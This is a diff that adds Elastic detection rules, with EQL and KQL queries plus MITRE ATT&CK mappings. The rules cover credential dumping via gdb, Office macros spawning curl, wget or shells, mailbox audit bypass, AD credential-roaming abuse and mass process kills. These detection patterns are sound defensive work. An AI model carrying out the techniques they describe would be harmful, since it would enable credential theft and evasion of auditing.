\"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) and process.code_signature.trusted == true\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n ) or \n\n /* Dropbox */\n (process.name : \"Dropbox.exe\" and (process.code_signature.subject_name : \"Dropbox, Inc\" and\n process.code_signature.trusted == true) and dns.question.name : (\"api.dropboxapi.com\", \"*.dropboxusercontent.com\")\n ) or \n\n /* Obsidian - Plugins are stored on raw.githubusercontent.com */\n (process.name : \"Obsidian.exe\" and (process.code_signature.subject_name : \"Dynalist Inc\" and\n process.code_signature.trusted == true) and dns.question.name : \"raw.githubusercontent.com\"\n ) or \n\n /* WebExperienceHostApp */\n (process.name : \"WebExperienceHostApp.exe\" and (process.code_signature.subject_name : \"Microsoft Windows\" and\n process.code_signature.trusted == true) and dns.question.name : (\"onedrive.live.com\", \"skyapi.onedrive.live.com\")\n )\n ) \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "66883649-f908-4a5b-a1e0-54090a1d3a32", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1102", + "name": "Web Service", + "reference": "https://attack.mitre.org/techniques/T1102/" + }, + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/", + "subtechnique": [ + { + "id": "T1567.001", + "name": "Exfiltration to Code Repository", + "reference": "https://attack.mitre.org/techniques/T1567/001/" + }, + { + "id": "T1567.002", + "name": "Exfiltration to Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1567/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "66883649-f908-4a5b-a1e0-54090a1d3a32_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_2.json b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_2.json new file mode 100644 index 00000000000..b197bbc4e8e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_2.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for potential memory dumping through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include \"truffleproc\" and \"bash-memory-dump\". This behavior should not happen by default, and should be investigated thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux Process Hooking via GDB", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"gdb\" and process.args in (\"--pid\", \"-p\") and \n/* Covered by d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f */\nprocess.args != \"1\"\n", + "references": [ + "https://github.com/controlplaneio/truffleproc", + "https://github.com/hajzer/bash-memory-dump" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "66c058f3-99f4-4d18-952b-43348f2577a0", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "66c058f3-99f4-4d18-952b-43348f2577a0_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_3.json b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_3.json new file mode 100644 index 00000000000..6edd3236ef1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66c058f3-99f4-4d18-952b-43348f2577a0_3.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for potential memory dumping through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include \"truffleproc\" and \"bash-memory-dump\". This behavior should not happen by default, and should be investigated thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux Process Hooking via GDB", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"gdb\" and process.args in (\"--pid\", \"-p\") and \n/* Covered by d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f */\nprocess.args != \"1\"\n", + "references": [ + "https://github.com/controlplaneio/truffleproc", + "https://github.com/hajzer/bash-memory-dump" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "66c058f3-99f4-4d18-952b-43348f2577a0", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "66c058f3-99f4-4d18-952b-43348f2577a0_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_106.json b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_106.json new file mode 100644 index 00000000000..aeb5b2a1f18 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66da12b1-ac83-40eb-814c-07ed1d82b7b9_106.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, and Excel). These child processes are often launched during exploitation of Office applications or by documents with malicious macros.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious macOS MS Office Child Process", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.parent.name:(\"Microsoft Word\", \"Microsoft PowerPoint\", \"Microsoft Excel\") and\n process.name:\n (\n \"bash\",\n \"dash\",\n \"sh\",\n \"tcsh\",\n \"csh\",\n \"zsh\",\n \"ksh\",\n \"fish\",\n \"python*\",\n \"perl*\",\n \"php*\",\n \"osascript\",\n \"pwsh\",\n \"curl\",\n \"wget\",\n \"cp\",\n \"mv\",\n \"base64\",\n \"launchctl\"\n ) and\n /* noisy false positives related to product version discovery and office errors reporting */\n not process.args:\n (\n \"ProductVersion\",\n \"hw.model\",\n \"ioreg\",\n \"ProductName\",\n \"ProductUserVisibleVersion\",\n \"ProductBuildVersion\",\n \"/Library/Application Support/Microsoft/MERP*/Microsoft Error Reporting.app/Contents/MacOS/Microsoft Error Reporting\"\n )\n", + "references": [ + "https://blog.malwarebytes.com/cybercrime/2017/02/microsoft-office-macro-malware-targets-macs/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "66da12b1-ac83-40eb-814c-07ed1d82b7b9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "66da12b1-ac83-40eb-814c-07ed1d82b7b9_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_9.json b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_9.json new file mode 100644 index 00000000000..b77be0ff015 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/670b3b5a-35e5-42db-bd36-6c5b9b4b7313_9.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Modification of the msPKIAccountCredentials", + "query": "event.action:\"Directory Service Changes\" and event.code:\"5136\" and\n winlog.event_data.AttributeLDAPDisplayName:\"msPKIAccountCredentials\" and winlog.event_data.OperationType:\"%%14674\" and\n not winlog.event_data.SubjectUserSid : \"S-1-5-18\"\n", + "references": [ + "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming", + "https://social.technet.microsoft.com/wiki/contents/articles/11483.windows-credential-roaming.aspx", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.OperationType", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Data Source: Active Directory", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 9 + }, + "id": "670b3b5a-35e5-42db-bd36-6c5b9b4b7313_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_103.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_103.json new file mode 100644 index 00000000000..eba65d4a0a3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_103.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account.", + "false_positives": [ + "Legitimate allowlisting of noisy accounts" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Mailbox Audit Logging Bypass", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success\n", + "references": [ + "https://twitter.com/misconfig/status/1476144066807140355" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Initial Access", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_105.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_105.json new file mode 100644 index 00000000000..16b5cb248fb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_105.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account.", + "false_positives": [ + "Legitimate allowlisting of noisy accounts" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Mailbox Audit Logging Bypass", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success\n", + "references": [ + "https://twitter.com/misconfig/status/1476144066807140355" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Initial Access", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_206.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_206.json new file mode 100644 index 00000000000..8b1e2954283 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_206.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account.", + "false_positives": [ + "Legitimate allowlisting of noisy accounts" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Mailbox Audit Logging Bypass", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success\n", + "references": [ + "https://twitter.com/misconfig/status/1476144066807140355" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Initial Access", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_112.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_112.json new file mode 100644 index 00000000000..eda17391128 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_112.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "High Number of Process Terminations", + "note": "## Triage and analysis\n\n### Investigating High Number of Process Terminations\n\nAttackers can kill processes for a variety of purposes. For example, they can kill process associated with business applications and databases to release the lock on files used by these applications so they may be encrypted,or stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of process terminations via pkill from the same host within a short time period.\n\n#### Possible investigation steps\n\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user.\n- Examine the contents of session leading to the process termination(s) via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities.\n- Examine the process killed during the malicious execution\n - Identify imment threat to the system from the process killed.\n - Take necessary incident response actions to respawn necessary process.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:linux and event.type:start and process.name:\"pkill\" and process.args:\"-f\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "67f8443a-4ff3-4a70-916d-3cfa3ae9f02b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "threshold": { + "field": [ + "host.id", + "process.executable", + "user.name" + ], 